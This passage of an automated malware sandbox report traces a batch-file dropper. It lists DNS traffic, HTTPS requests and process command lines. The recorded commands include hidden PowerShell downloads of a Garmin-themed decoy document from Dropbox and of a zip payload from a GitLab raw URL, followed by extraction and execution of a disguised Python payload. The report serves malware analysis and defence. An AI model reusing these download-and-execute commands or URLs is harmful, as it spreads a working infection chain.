                                                                                                                                                                                                                          Dec 19, 2024 14:13:33.848366976 CET49744443192.168.2.6172.65.251.78

                                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                          Dec 19, 2024 14:13:23.490469933 CET5045553192.168.2.61.1.1.1
                                                                                                                                                                                                                          Dec 19, 2024 14:13:23.627548933 CET53504551.1.1.1192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:26.124356031 CET5700453192.168.2.61.1.1.1
                                                                                                                                                                                                                          Dec 19, 2024 14:13:26.411411047 CET53570041.1.1.1192.168.2.6
                                                                                                                                                                                                                          Dec 19, 2024 14:13:30.665138960 CET5776253192.168.2.61.1.1.1
                                                                                                                                                                                                                          Dec 19, 2024 14:13:30.808206081 CET53577621.1.1.1192.168.2.6

                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                          Dec 19, 2024 14:13:23.490469933 CET192.168.2.61.1.1.10x57f7Standard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 19, 2024 14:13:26.124356031 CET192.168.2.61.1.1.10x288Standard query (0)ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 19, 2024 14:13:30.665138960 CET192.168.2.61.1.1.10x9f1bStandard query (0)gitlab.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                          Dec 19, 2024 14:13:23.627548933 CET1.1.1.1192.168.2.60x57f7No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                          Dec 19, 2024 14:13:23.627548933 CET1.1.1.1192.168.2.60x57f7No error (0)www-env.dropbox-dns.com162.125.69.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 19, 2024 14:13:26.411411047 CET1.1.1.1192.168.2.60x288No error (0)ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                          Dec 19, 2024 14:13:26.411411047 CET1.1.1.1192.168.2.60x288No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Dec 19, 2024 14:13:30.808206081 CET1.1.1.1192.168.2.60x9f1bNo error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false

                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                          • www.dropbox.com
                                                                                                                                                                                                                          • gitlab.com

                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          0192.168.2.649721162.125.69.184435272C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-19 13:13:25 UTC192OUTGET /scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1 HTTP/1.1
                                                                                                                                                                                                                          Host: www.dropbox.com
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          2024-12-19 13:13:26 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                          Content-Security-Policy: media-src https://* blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; img-src https://* data: blob: ; frame-ancestors 'self' https://*.dropbox.com ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/present [TRUNCATED]
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Location: https://ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.com/cd/0/get/CghiprcqMx-t_0kStAteoG_83aAw5xZa7Q5hKqVTa89ndGogNav1Efbjjd4JGvg80xoHwtB2646VZyPZAja7QxjnPwJAzSxLGw2iKfSbU_JcRlxGELUaMwLFCoE7DM4MlEEYJeRNURq2X63NC3vPq8QW/file?dl=1#
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                          Set-Cookie: gvc=MjMyMTAzMDU5NjYyNzYyMTc1NTI4ODIyODcwOTQ1NzU0MTkzNjg2; Path=/; Expires=Tue, 18 Dec 2029 13:13:25 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                          Set-Cookie: t=eK5Oy0kF8O6KPy2vKz7erm0b; Path=/; Domain=dropbox.com; Expires=Fri, 19 Dec 2025 13:13:25 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                          Set-Cookie: __Host-js_csrf=eK5Oy0kF8O6KPy2vKz7erm0b; Path=/; Expires=Fri, 19 Dec 2025 13:13:25 GMT; Secure; SameSite=None
                                                                                                                                                                                                                          Set-Cookie: __Host-ss=GuhY1p_exQ; Path=/; Expires=Fri, 19 Dec 2025 13:13:25 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                          Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 18 Dec 2029 13:13:25 GMT
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                          X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                          X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                          Content-Length: 17
                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:13:25 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                          Server: envoy
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                                                                                                                          X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                          X-Dropbox-Request-Id: 81f779b4965346748db7e6a4abd6bbc6
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          2024-12-19 13:13:26 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                          Data Ascii: ...status=302-->


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          1192.168.2.649738172.65.251.784435260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-19 13:13:32 UTC95OUTGET /garvdsf/dsfg/-/raw/main/FGa1712.zip HTTP/1.1
                                                                                                                                                                                                                          Host: gitlab.com
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          2024-12-19 13:13:32 UTC453INHTTP/1.1 302 Found
                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:13:32 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Location: https://gitlab.com/users/sign_in
                                                                                                                                                                                                                          CF-Ray: 8f47a688fde0ef9d-EWR
                                                                                                                                                                                                                          CF-Cache-Status: MISS
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          Set-Cookie: _gitlab_session=13c935dd1f14529e277b183bc3a87758; path=/; expires=Thu, 19 Dec 2024 15:13:32 GMT; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          2024-12-19 13:13:32 UTC2134INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                                                          Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                                                                                          2024-12-19 13:13:32 UTC498INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 72 46 6b 79 35 75 4f 34 31 4a 63 37 78 4f 35 56 7a 68 34 52 58 67 71 6c 71 44 52 61 58 75 44 6b 51 4b 31 57 76 5a 4f 65 32 74 78 51 6b 6b 47 77 4a 6e 76 25 32 42 4b 61 49 67 46 47 6e 43 42 39 5a 7a 72 6e 25 32 46 43 4e 59 57 6a 50 4a 61 44 53 4f 79 59 38 53 47 71 36 36 45 76 5a 45 41 34 64 36 41 6c 59 5a 55 55 56 61 69 70 51 47 6a 66 4e 37 50 31 75 49 71 4c 35 45 6c 65 42 32 6f 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22
                                                                                                                                                                                                                          Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rFky5uO41Jc7xO5Vzh4RXgqlqDRaXuDkQK1WvZOe2txQkkGwJnv%2BKaIgFGnCB9Zzrn%2FCNYWjPJaDSOyY8SGq66EvZEA4d6AlYZUUVaipQGjfN7P1uIqL5EleB2o%3D"}],"group":"cf-nel","max_age":604800}NEL: {"
                                                                                                                                                                                                                          2024-12-19 13:13:32 UTC104INData Raw: 36 32 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 75 73 65 72 73 2f 73 69 67 6e 5f 69 6e 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                          Data Ascii: 62<html><body>You are being <a href="https://gitlab.com/users/sign_in">redirected</a>.</body></html>
                                                                                                                                                                                                                          2024-12-19 13:13:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                          Start time:08:13:18
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngadsfkgj17.bat" "
                                                                                                                                                                                                                          Imagebase:0x7ff7b93c0000
                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                          Start time:08:13:18
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                          Start time:08:13:19
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:chcp.com 437
                                                                                                                                                                                                                          Imagebase:0x7ff7ea530000
                                                                                                                                                                                                                          File size:14'848 bytes
                                                                                                                                                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                          Start time:08:13:19
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:find
                                                                                                                                                                                                                          Imagebase:0x7ff782cc0000
                                                                                                                                                                                                                          File size:17'920 bytes
                                                                                                                                                                                                                          MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                          Start time:08:13:19
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:findstr /L /I set "C:\Users\user\Desktop\hngadsfkgj17.bat"
                                                                                                                                                                                                                          Imagebase:0x7ff796ca0000
                                                                                                                                                                                                                          File size:36'352 bytes
                                                                                                                                                                                                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                          Start time:08:13:19
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:findstr /L /I goto "C:\Users\user\Desktop\hngadsfkgj17.bat"
                                                                                                                                                                                                                          Imagebase:0x7ff796ca0000
                                                                                                                                                                                                                          File size:36'352 bytes
                                                                                                                                                                                                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                          Start time:08:13:20
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:findstr /L /I echo "C:\Users\user\Desktop\hngadsfkgj17.bat"
                                                                                                                                                                                                                          Imagebase:0x7ff796ca0000
                                                                                                                                                                                                                          File size:36'352 bytes
                                                                                                                                                                                                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                          Start time:08:13:20
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:findstr /L /I pause "C:\Users\user\Desktop\hngadsfkgj17.bat"
                                                                                                                                                                                                                          Imagebase:0x7ff796ca0000
                                                                                                                                                                                                                          File size:36'352 bytes
                                                                                                                                                                                                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                          Start time:08:13:20
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                                                          Imagebase:0x7ff7b93c0000
                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                          Start time:08:13:20
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:find
                                                                                                                                                                                                                          Imagebase:0x7ff782cc0000
                                                                                                                                                                                                                          File size:17'920 bytes
                                                                                                                                                                                                                          MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                          Start time:08:13:20
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                                                          Imagebase:0x7ff7b93c0000
                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                          Start time:08:13:20
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"
                                                                                                                                                                                                                          Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                          Start time:08:13:28
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"
                                                                                                                                                                                                                          Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                          Start time:08:13:29
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"
                                                                                                                                                                                                                          Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                          Start time:08:13:40
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                                                                                                                                                                                                                          Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                          Start time:08:13:52
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"
                                                                                                                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                            Function 00007FFD345A09CD Relevance: 3.1, Strings: 2, Instructions: 553COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000000C.00000002.2309227175.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_7ffd345a0000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: .A_H$plq4
                                                                                                                                                                                                                            • API String ID: 0-1991784877
                                                                                                                                                                                                                            • Opcode ID: b30be7068b30f17b88ca4f748f4a44a7348d952028daf90923f582c14a2ca3dd
                                                                                                                                                                                                                            • Instruction ID: ed39fc17d576b690a79b5749564852cc60c959f4c681e9f1699479fa1f3d7a76
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b30be7068b30f17b88ca4f748f4a44a7348d952028daf90923f582c14a2ca3dd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58F12322E1EBC91FE7979B2858A51A53FE1EF57324F0801FBD589C70E3D919A805C352
                                                                                                                                                                                                                            Function 00007FFD345A375E Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000000C.00000002.2309227175.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_7ffd345a0000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 66be9c733ebdb4021b55b99784d1639a9f5c314d4a12d1c8fd98d528e28670bb
                                                                                                                                                                                                                            • Instruction ID: 3890f0c2110f0c38518be42318446b7a792cd89f5ee5f052636b05da156dc41a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66be9c733ebdb4021b55b99784d1639a9f5c314d4a12d1c8fd98d528e28670bb
